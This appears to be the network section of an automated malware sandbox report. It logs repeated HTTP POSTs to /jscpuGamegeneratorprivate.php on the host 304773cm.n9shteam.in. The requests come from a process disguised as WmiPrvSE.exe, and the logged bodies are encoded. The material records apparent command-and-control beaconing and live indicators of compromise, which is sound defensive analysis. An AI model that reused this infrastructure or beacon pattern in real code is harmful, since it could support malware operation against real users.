Oct 27, 2024 02:44:30.063293934 CEST	50014	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:44:30.171391964 CEST	50014	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:44:41.236526966 CEST	50015	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:44:41.241996050 CEST	80	50015	188.114.96.3	192.168.2.4
Oct 27, 2024 02:44:41.242095947 CEST	50015	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:44:41.242340088 CEST	50015	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:44:41.247673988 CEST	80	50015	188.114.96.3	192.168.2.4
Oct 27, 2024 02:44:41.593754053 CEST	50015	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:44:41.599462032 CEST	80	50015	188.114.96.3	192.168.2.4
Oct 27, 2024 02:44:41.836158037 CEST	80	50015	188.114.96.3	192.168.2.4
Oct 27, 2024 02:44:41.895591021 CEST	50015	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:44:42.149847984 CEST	80	50015	188.114.96.3	192.168.2.4
Oct 27, 2024 02:44:42.149872065 CEST	80	50015	188.114.96.3	192.168.2.4
Oct 27, 2024 02:44:42.149919987 CEST	50015	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:44:42.300728083 CEST	50015	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:44:53.479856014 CEST	50016	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:44:53.485685110 CEST	80	50016	188.114.96.3	192.168.2.4
Oct 27, 2024 02:44:53.485774040 CEST	50016	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:44:53.485948086 CEST	50016	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:44:53.491221905 CEST	80	50016	188.114.96.3	192.168.2.4
Oct 27, 2024 02:44:53.843419075 CEST	50016	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:44:53.849400043 CEST	80	50016	188.114.96.3	192.168.2.4
Oct 27, 2024 02:44:54.081074953 CEST	80	50016	188.114.96.3	192.168.2.4
Oct 27, 2024 02:44:54.124469042 CEST	50016	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:44:54.396588087 CEST	80	50016	188.114.96.3	192.168.2.4
Oct 27, 2024 02:44:54.396601915 CEST	80	50016	188.114.96.3	192.168.2.4
Oct 27, 2024 02:44:54.396666050 CEST	50016	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:44:54.509728909 CEST	50016	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:45:01.280925035 CEST	50017	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:45:01.286551952 CEST	80	50017	188.114.96.3	192.168.2.4
Oct 27, 2024 02:45:01.286638975 CEST	50017	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:45:01.286842108 CEST	50017	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:45:01.292160988 CEST	80	50017	188.114.96.3	192.168.2.4
Oct 27, 2024 02:45:01.640275955 CEST	50017	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:45:01.645906925 CEST	80	50017	188.114.96.3	192.168.2.4
Oct 27, 2024 02:45:01.876427889 CEST	80	50017	188.114.96.3	192.168.2.4
Oct 27, 2024 02:45:01.921365023 CEST	50017	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:45:02.187419891 CEST	80	50017	188.114.96.3	192.168.2.4
Oct 27, 2024 02:45:02.187438965 CEST	80	50017	188.114.96.3	192.168.2.4
Oct 27, 2024 02:45:02.187506914 CEST	50017	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:45:02.377573967 CEST	50017	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:45:13.526837111 CEST	50018	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:45:13.534333944 CEST	80	50018	188.114.96.3	192.168.2.4
Oct 27, 2024 02:45:13.534439087 CEST	50018	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:45:13.534641981 CEST	50018	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:45:13.540879011 CEST	80	50018	188.114.96.3	192.168.2.4
Oct 27, 2024 02:45:13.890558958 CEST	50018	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:45:13.896219969 CEST	80	50018	188.114.96.3	192.168.2.4
Oct 27, 2024 02:45:14.130858898 CEST	80	50018	188.114.96.3	192.168.2.4
Oct 27, 2024 02:45:14.187100887 CEST	50018	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:45:14.590523958 CEST	80	50018	188.114.96.3	192.168.2.4
Oct 27, 2024 02:45:14.590538979 CEST	80	50018	188.114.96.3	192.168.2.4
Oct 27, 2024 02:45:14.590559006 CEST	80	50018	188.114.96.3	192.168.2.4
Oct 27, 2024 02:45:14.590614080 CEST	50018	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:45:14.590614080 CEST	50018	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:45:14.688220024 CEST	50018	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:45:21.594800949 CEST	50019	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:45:21.600363016 CEST	80	50019	188.114.96.3	192.168.2.4
Oct 27, 2024 02:45:21.600482941 CEST	50019	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:45:21.600655079 CEST	50019	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:45:21.605983973 CEST	80	50019	188.114.96.3	192.168.2.4
Oct 27, 2024 02:45:21.953015089 CEST	50019	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:45:21.958512068 CEST	80	50019	188.114.96.3	192.168.2.4
Oct 27, 2024 02:45:22.200206995 CEST	80	50019	188.114.96.3	192.168.2.4
Oct 27, 2024 02:45:22.249536037 CEST	50019	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:45:22.520334005 CEST	80	50019	188.114.96.3	192.168.2.4
Oct 27, 2024 02:45:22.520360947 CEST	80	50019	188.114.96.3	192.168.2.4
Oct 27, 2024 02:45:22.520440102 CEST	50019	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:45:22.617925882 CEST	50019	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:45:33.804033995 CEST	50020	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:45:33.809485912 CEST	80	50020	188.114.96.3	192.168.2.4
Oct 27, 2024 02:45:33.809617996 CEST	50020	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:45:33.809778929 CEST	50020	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:45:33.815090895 CEST	80	50020	188.114.96.3	192.168.2.4
Oct 27, 2024 02:45:34.155982018 CEST	50020	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:45:34.161351919 CEST	80	50020	188.114.96.3	192.168.2.4
Oct 27, 2024 02:45:34.437757969 CEST	80	50020	188.114.96.3	192.168.2.4
Oct 27, 2024 02:45:34.484040976 CEST	50020	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:45:34.785350084 CEST	80	50020	188.114.96.3	192.168.2.4
Oct 27, 2024 02:45:34.785379887 CEST	80	50020	188.114.96.3	192.168.2.4
Oct 27, 2024 02:45:34.785562992 CEST	50020	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:45:34.856957912 CEST	50020	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:45:41.567310095 CEST	50021	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:45:41.572839975 CEST	80	50021	188.114.96.3	192.168.2.4
Oct 27, 2024 02:45:41.573038101 CEST	50021	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:45:41.573242903 CEST	50021	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:45:41.578629017 CEST	80	50021	188.114.96.3	192.168.2.4
Oct 27, 2024 02:45:41.921638966 CEST	50021	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:45:41.927229881 CEST	80	50021	188.114.96.3	192.168.2.4
Oct 27, 2024 02:45:42.170876026 CEST	80	50021	188.114.96.3	192.168.2.4
Oct 27, 2024 02:45:42.218300104 CEST	50021	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:45:42.496515036 CEST	80	50021	188.114.96.3	192.168.2.4
Oct 27, 2024 02:45:42.496530056 CEST	80	50021	188.114.96.3	192.168.2.4
Oct 27, 2024 02:45:42.496608019 CEST	50021	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:45:42.670192957 CEST	50021	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:45:53.797432899 CEST	50022	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:45:53.803359985 CEST	80	50022	188.114.96.3	192.168.2.4
Oct 27, 2024 02:45:53.803452969 CEST	50022	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:45:53.803710938 CEST	50022	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:45:53.809062004 CEST	80	50022	188.114.96.3	192.168.2.4
Oct 27, 2024 02:45:54.156109095 CEST	50022	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:45:54.161617994 CEST	80	50022	188.114.96.3	192.168.2.4
Oct 27, 2024 02:45:54.404151917 CEST	80	50022	188.114.96.3	192.168.2.4
Oct 27, 2024 02:45:54.452698946 CEST	50022	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:45:54.718784094 CEST	80	50022	188.114.96.3	192.168.2.4
Oct 27, 2024 02:45:54.718810081 CEST	80	50022	188.114.96.3	192.168.2.4
Oct 27, 2024 02:45:54.719038010 CEST	50022	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:45:54.833233118 CEST	50022	80	192.168.2.4	188.114.96.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 27, 2024 02:42:15.334898949 CEST	62601	53	192.168.2.4	1.1.1.1
Oct 27, 2024 02:42:15.347975016 CEST	53	62601	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 27, 2024 02:42:15.334898949 CEST	192.168.2.4	1.1.1.1	0xd7f6	Standard query (0)	304773cm.n9shteam.in	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 27, 2024 02:42:15.347975016 CEST	1.1.1.1	192.168.2.4	0xd7f6	No error (0)	304773cm.n9shteam.in		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 27, 2024 02:42:15.347975016 CEST	1.1.1.1	192.168.2.4	0xd7f6	No error (0)	304773cm.n9shteam.in		188.114.97.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

304773cm.n9shteam.in

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	188.114.96.3	80	3720	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 02:42:15.358254910 CEST	284	OUT	POST /jscpuGamegeneratorprivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 304773cm.n9shteam.in Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Oct 27, 2024 02:42:15.703035116 CEST	344	OUT	Data Raw: 00 00 04 06 06 0f 04 00 05 06 02 01 02 06 01 0a 00 06 05 0f 02 04 03 08 03 0e 0f 0c 06 52 03 00 0d 0e 04 0a 01 07 05 0b 0d 02 07 06 04 06 04 0e 05 0a 0e 5c 0f 52 06 00 01 03 07 01 07 02 04 0c 01 0a 0f 0e 07 52 04 05 0b 0e 0e 54 0d 04 0e 06 07 07 Data Ascii: R\RRTYQQ\L~k^}\wruOwvkU\|BqcU\|\|ZkZool[{N_^\|CRCww`j_~V@Bzmb}rq
Oct 27, 2024 02:42:15.976058960 CEST	25	IN	HTTP/1.1 100 Continue
Oct 27, 2024 02:42:16.313039064 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 27 Oct 2024 00:42:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6e1h8JgnGyseVFSzKoHGDMB9HVh7cC6ycikMJambnvrCXxVtnBtJOrXi%2FS0XAD6jDZCn2L04iKjfETv2IjdPkvUJkqBF%2B2pMAsBvJNh3F8gbuG%2BNB97Fqug5inktV6naiXXeRaKdNA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d8ea5297dc4ea0a-DFW alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=1033&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=628&delivery_rate=1482088&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 35 34 63 0d 0a 56 4a 7e 05 6f 6e 74 59 6f 5c 63 5d 6b 58 68 5a 7d 64 64 52 7c 70 57 41 7b 63 52 01 6a 62 51 58 60 60 7e 55 6e 5f 6a 5e 76 58 70 4b 7d 5b 78 01 55 4b 71 0c 60 62 77 44 7f 71 6a 5c 6b 49 7a 0c 78 48 78 0a 6a 63 63 01 62 5c 79 07 77 71 7d 00 6b 5f 54 03 6a 52 64 4e 7e 77 67 01 75 76 7b 06 7c 5b 6e 5b 6a 4e 6e 5b 6c 74 6f 5f 79 74 6c 4f 7b 7e 67 4b 78 62 64 03 6c 5a 7a 4f 68 63 68 01 79 77 5e 07 7c 62 6c 5b 75 5f 52 04 7a 51 41 5b 7c 77 5a 0d 7c 5f 79 0c 77 6c 6c 41 7b 7f 7c 05 74 5e 72 0d 79 07 65 48 7c 7c 6a 07 7a 71 7e 49 61 63 55 4a 76 4f 67 5f 77 62 62 50 7e 5d 79 5f 77 5b 7d 07 76 66 70 09 68 0a 75 01 60 6f 73 5d 7f 73 6c 01 6f 6f 7f 03 6f 5e 66 4a 7c 6d 78 08 77 49 6c 03 69 62 53 50 69 53 64 53 7b 43 75 5f 7d 62 7a 5c 7b 5d 46 51 7c 55 68 0d 69 06 68 0c 7d 67 61 5e 6f 54 74 5f 78 62 67 59 68 5f 59 49 7d 64 78 53 68 63 66 52 7a 5d 7b 5d 7e 61 78 4b 77 63 65 51 7b 5c 79 02 77 76 68 48 7d 48 7c 07 7d 76 5f 0a 74 72 77 03 7d 62 69 4c 7f 67 66 0b 79 76 5e 0a 7c 73 7b 47 76 62 7d 41 77 [TRUNCATED] Data Ascii: 54cVJ~ontYo\c]kXhZ}ddR\|pWA{cRjbQX``~Un_j^vXpK}[xUKq`bwDqj\kIzxHxjccb\ywq}k_TjRdN~wguv{\|[n[jNn[lto_ytlO{~gKxbdlZzOhchyw^\|bl[u_RzQA[\|wZ\|_ywllA{\|t^ryeH\|\|jzq~IacUJvOg_wbbP~]y_w[}vfphu`os]slooo^fJ\|mxwIlibSPiSdS{Cu_}bz\{]FQ\|Uhih}ga^oTt_xbgYh_YI}dxShcfRz]{]~axKwceQ{\ywvhH}H\|}v_trw}biLgfyv^\|s{Gvb}AwaSH\|_P}ld}wwuq{x\u}`}I{whxw\|MxSYxbdHxcPO`tIxId~LQwqV~\|wH\|Yp}qavR\|N{\|ht^fAyO}~\|rx_zvc]vaxvqb~`TtLmOwuZB~lSt
Oct 27, 2024 02:42:16.313096046 CEST	897	IN	Data Raw: 42 70 4d 7f 5d 78 00 78 7c 55 45 7a 60 7a 01 7d 7d 7c 4e 74 49 52 04 7e 62 76 08 7d 7d 55 08 7b 7d 54 05 7d 5c 71 02 7c 70 7c 0c 7c 52 70 40 7d 60 74 0a 7d 67 72 4d 7b 43 77 07 78 5c 78 05 7c 61 6b 02 7d 49 7b 0a 7f 4e 71 0b 79 4d 78 07 7d 4c 52 Data Ascii: BpM]xx\|UEz`z}}\|NtIR~bv}}U{}T}\q\|p\|\|Rp@}`t}grM{Cwx\x\|ak}I{NqyMx}LRwMy{aawfZ~v\|M}vyvr}bq\|IPCxvl}cwJvbywamHav}ltC~YQJu_cxLa~^iyg\|xIRLy}Uyblx]v{]NZoYp}bZ^vrs[}l]E^xXq@alpz\|hwp_UyanY\|\|~_z\yvxBagx[L~Jx^W\
Oct 27, 2024 02:42:16.313127041 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	188.114.96.3	80	7420	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 02:42:28.453943014 CEST	320	OUT	POST /jscpuGamegeneratorprivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Host: 304773cm.n9shteam.in Content-Length: 336 Expect: 100-continue Connection: Keep-Alive
Oct 27, 2024 02:42:28.812484026 CEST	336	OUT	Data Raw: 00 07 01 05 06 0a 04 06 05 06 02 01 02 05 01 0b 00 05 05 0f 02 07 03 01 03 05 0d 57 07 0e 00 02 0a 03 04 5d 00 0c 06 56 0f 02 05 53 07 54 06 56 05 05 0e 01 0d 03 04 02 06 55 04 51 06 57 07 5d 02 07 0f 09 00 0f 05 00 0c 57 0b 00 0d 54 0c 51 06 00 Data Ascii: W]VSTVUQW]WTQPXVW\L~\|N[\wan\ueQkR~Xto\|~ctllwo`~\|Ct@vgc_}e~V@{STLey
Oct 27, 2024 02:42:29.050370932 CEST	25	IN	HTTP/1.1 100 Continue
Oct 27, 2024 02:42:29.375179052 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 27 Oct 2024 00:42:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xFw5tI4qTeDBR5yxKEZuhmONHEjpJWVpifklzTzq%2FNSnsw0H9S54pVImtLLUCfOc2VcD6gleylWyyyQbbJQ%2F3KaIZMrzhVmHKil0OjG2AXKhUYmj%2FLfZpvTmiiZWmQel15xtk6mwyg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d8ea57b2fffe81f-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1402&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=656&delivery_rate=1059253&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 35 34 63 0d 0a 56 4a 7e 00 7b 6e 7f 03 78 4c 74 46 7f 4f 74 58 69 59 6c 50 6b 63 79 0a 6d 5d 5a 04 7e 5b 73 58 63 60 79 08 7a 58 79 03 76 58 6b 5f 7d 5b 78 01 55 4b 71 0c 60 62 77 44 7f 71 6a 5c 6b 49 7a 0c 78 48 78 0a 6a 63 63 01 62 5c 79 07 77 71 7d 00 6b 5f 54 03 6a 52 64 4e 7e 77 67 01 75 76 7b 06 7c 5c 69 00 7d 70 75 03 79 67 77 58 78 01 70 4c 7b 7e 64 5c 7a 71 6c 04 6c 63 5c 06 7c 06 60 03 78 64 60 02 69 61 7c 5e 61 07 64 04 7a 51 41 5b 7c 77 5a 0d 7c 5f 79 0c 77 6c 6c 41 7b 7f 7c 05 74 5e 72 0d 79 07 65 48 7c 7c 6a 07 7a 71 7e 49 61 63 55 4a 76 4f 67 5f 77 62 62 50 7e 5d 79 5f 77 5b 7d 07 76 66 70 09 68 0a 75 01 60 6f 73 5d 7f 73 6c 01 6f 6f 7f 03 6f 5e 66 4a 7c 6d 78 08 77 49 6c 03 69 62 53 50 69 53 64 53 7b 43 75 5f 7d 62 7a 5c 7b 5d 46 51 7c 55 68 0d 69 06 68 0c 7d 67 61 5e 6f 54 74 5f 78 62 67 59 68 5f 59 49 7d 64 78 53 68 63 66 52 7a 5d 7b 5d 7e 61 78 4b 77 63 65 51 7b 5c 79 02 77 76 68 48 7d 48 7c 07 7d 76 5f 0a 74 72 77 03 7d 62 69 4c 7f 67 66 0b 79 76 5e 0a 7c 73 7b 47 76 62 7d 41 77 [TRUNCATED] Data Ascii: 54cVJ~{nxLtFOtXiYlPkcym]Z~[sXc`yzXyvXk_}[xUKq`bwDqj\kIzxHxjccb\ywq}k_TjRdN~wguv{\|\i}puygwXxpL{~d\zqllc\\|`xd`ia\|^adzQA[\|wZ\|_ywllA{\|t^ryeH\|\|jzq~IacUJvOg_wbbP~]y_w[}vfphu`os]slooo^fJ\|mxwIlibSPiSdS{Cu_}bz\{]FQ\|Uhih}ga^oTt_xbgYh_YI}dxShcfRz]{]~axKwceQ{\ywvhH}H\|}v_trw}biLgfyv^\|s{Gvb}AwaSH\|_P}ld}wwuq{x\u}`}I{whxw\|MxSYxbdHxcPO`tIxId~LQwqV~\|wH\|Yp}qavR\|N{\|ht^fAyO}~\|rx_zvc]vaxvqb~`TtLmOwuZB~l
Oct 27, 2024 02:42:29.375233889 CEST	905	IN	Data Raw: 53 06 74 42 70 4d 7f 5d 78 00 78 7c 55 45 7a 60 7a 01 7d 7d 7c 4e 74 49 52 04 7e 62 76 08 7d 7d 55 08 7b 7d 54 05 7d 5c 71 02 7c 70 7c 0c 7c 52 70 40 7d 60 74 0a 7d 67 72 4d 7b 43 77 07 78 5c 78 05 7c 61 6b 02 7d 49 7b 0a 7f 4e 71 0b 79 4d 78 07 Data Ascii: StBpM]xx\|UEz`z}}\|NtIR~bv}}U{}T}\q\|p\|\|Rp@}`t}grM{Cwx\x\|ak}I{NqyMx}LRwMy{aawfZ~v\|M}vyvr}bq\|IPCxvl}cwJvbywamHav}ltC~YQJu_cxLa~^iyg\|xIRLy}Uyblx]v{]NZoYp}bZ^vrs[}l]E^xXq@alpz\|hwp_UyanY\|\|~_z\yvxBagx[L~Jx

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49738	188.114.96.3	80	7744	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 02:42:38.294428110 CEST	272	OUT	POST /jscpuGamegeneratorprivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 304773cm.n9shteam.in Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Oct 27, 2024 02:42:38.640119076 CEST	344	OUT	Data Raw: 05 06 04 01 06 08 01 01 05 06 02 01 02 01 01 03 00 0b 05 09 02 0c 03 09 07 0f 0d 01 03 07 01 52 0d 51 04 0e 03 01 03 07 0c 06 05 03 07 01 06 06 03 03 0f 59 0f 04 05 07 06 07 06 06 05 05 00 0f 03 53 0f 00 07 03 01 07 0b 0f 0c 54 0f 0d 0d 04 05 0d Data Ascii: RQYSTTR\L~N\|pfwrv_wepO\|B}tRs_\|]\|JycJ{YjkChAttlOie~V@x}PNru
Oct 27, 2024 02:42:38.913938046 CEST	25	IN	HTTP/1.1 100 Continue
Oct 27, 2024 02:42:39.229060888 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 27 Oct 2024 00:42:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9XR4CgU%2B0WhLwPKyLRWUVJ4CW4AHpgatbbpkBU1MlRmVAD7nT9n8B%2F74yYV7KQ52U%2BgTMxp0mFs4gMHQrwnKA51caC5YouiD2WGVRgCaubsn7YkVyzqOCMTg7LCxNk3LC46fQgVzEQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d8ea5b8dda045fb-DFW alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=1124&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=616&delivery_rate=1309222&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 35 34 63 0d 0a 56 4a 7e 01 6c 43 67 4a 7b 71 67 5d 6b 62 74 5a 69 59 73 41 68 5e 71 40 7a 60 68 4f 69 4c 60 02 77 63 58 52 6e 5f 79 00 75 00 7b 5f 69 5b 78 01 55 4b 71 0c 60 62 77 44 7f 71 6a 5c 6b 49 7a 0c 78 48 78 0a 6a 63 63 01 62 5c 79 07 77 71 7d 00 6b 5f 54 03 6a 52 64 4e 7e 77 67 01 75 76 7b 06 7c 5c 6d 49 7e 73 72 5e 6f 5e 6c 04 6f 01 68 01 78 6d 7f 49 79 5b 73 59 7b 63 5b 5a 7d 60 60 49 7b 74 60 44 7e 62 7f 07 62 62 67 59 7a 51 41 5b 7c 77 5a 0d 7c 5f 79 0c 77 6c 6c 41 7b 7f 7c 05 74 5e 72 0d 79 07 65 48 7c 7c 6a 07 7a 71 7e 49 61 63 55 4a 76 4f 67 5f 77 62 62 50 7e 5d 79 5f 77 5b 7d 07 76 66 70 09 68 0a 75 01 60 6f 73 5d 7f 73 6c 01 6f 6f 7f 03 6f 5e 66 4a 7c 6d 78 08 77 49 6c 03 69 62 53 50 69 53 64 53 7b 43 75 5f 7d 62 7a 5c 7b 5d 46 51 7c 55 68 0d 69 06 68 0c 7d 67 61 5e 6f 54 74 5f 78 62 67 59 68 5f 59 49 7d 64 78 53 68 63 66 52 7a 5d 7b 5d 7e 61 78 4b 77 63 65 51 7b 5c 79 02 77 76 68 48 7d 48 7c 07 7d 76 5f 0a 74 72 77 03 7d 62 69 4c 7f 67 66 0b 79 76 5e 0a 7c 73 7b 47 76 62 7d 41 77 [TRUNCATED] Data Ascii: 54cVJ~lCgJ{qg]kbtZiYsAh^q@z`hOiL`wcXRn_yu{_i[xUKq`bwDqj\kIzxHxjccb\ywq}k_TjRdN~wguv{\|\mI~sr^o^lohxmIy[sY{c[Z}``I{t`D~bbbgYzQA[\|wZ\|_ywllA{\|t^ryeH\|\|jzq~IacUJvOg_wbbP~]y_w[}vfphu`os]slooo^fJ\|mxwIlibSPiSdS{Cu_}bz\{]FQ\|Uhih}ga^oTt_xbgYh_YI}dxShcfRz]{]~axKwceQ{\ywvhH}H\|}v_trw}biLgfyv^\|s{Gvb}AwaSH\|_P}ld}wwuq{x\u}`}I{whxw\|MxSYxbdHxcPO`tIxId~LQwqV~\|wH\|Yp}qavR\|N{\|ht^fAyO}~\|rx_zvc]vaxvqb~`TtLmOwuZB~lSt
Oct 27, 2024 02:42:39.229099035 CEST	902	IN	Data Raw: 42 70 4d 7f 5d 78 00 78 7c 55 45 7a 60 7a 01 7d 7d 7c 4e 74 49 52 04 7e 62 76 08 7d 7d 55 08 7b 7d 54 05 7d 5c 71 02 7c 70 7c 0c 7c 52 70 40 7d 60 74 0a 7d 67 72 4d 7b 43 77 07 78 5c 78 05 7c 61 6b 02 7d 49 7b 0a 7f 4e 71 0b 79 4d 78 07 7d 4c 52 Data Ascii: BpM]xx\|UEz`z}}\|NtIR~bv}}U{}T}\q\|p\|\|Rp@}`t}grM{Cwx\x\|ak}I{NqyMx}LRwMy{aawfZ~v\|M}vyvr}bq\|IPCxvl}cwJvbywamHav}ltC~YQJu_cxLa~^iyg\|xIRLy}Uyblx]v{]NZoYp}bZ^vrs[}l]E^xXq@alpz\|hwp_UyanY\|\|~_z\yvxBagx[L~Jx^W\

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49739	188.114.96.3	80	8104	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 02:42:47.340200901 CEST	337	OUT	POST /jscpuGamegeneratorprivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: 304773cm.n9shteam.in Content-Length: 332 Expect: 100-continue Connection: Keep-Alive
Oct 27, 2024 02:42:47.687000036 CEST	332	OUT	Data Raw: 00 04 01 06 03 08 04 05 05 06 02 01 02 05 01 03 00 04 05 00 02 06 03 00 01 03 0f 51 03 04 02 09 0c 0f 06 0f 07 01 04 55 0b 04 04 0a 07 51 02 0e 03 00 0f 0c 0e 02 06 0a 06 03 07 05 01 06 00 01 00 57 0c 08 04 05 05 03 0d 07 0f 07 0c 0c 0e 08 04 06 Data Ascii: QUQWY\L~kY~tb[Lbf\|vX`BZpo^{UoxNe[}Z@cthju~V@z}~y\_
Oct 27, 2024 02:42:47.942156076 CEST	25	IN	HTTP/1.1 100 Continue
Oct 27, 2024 02:42:48.150974989 CEST	25	IN	HTTP/1.1 100 Continue
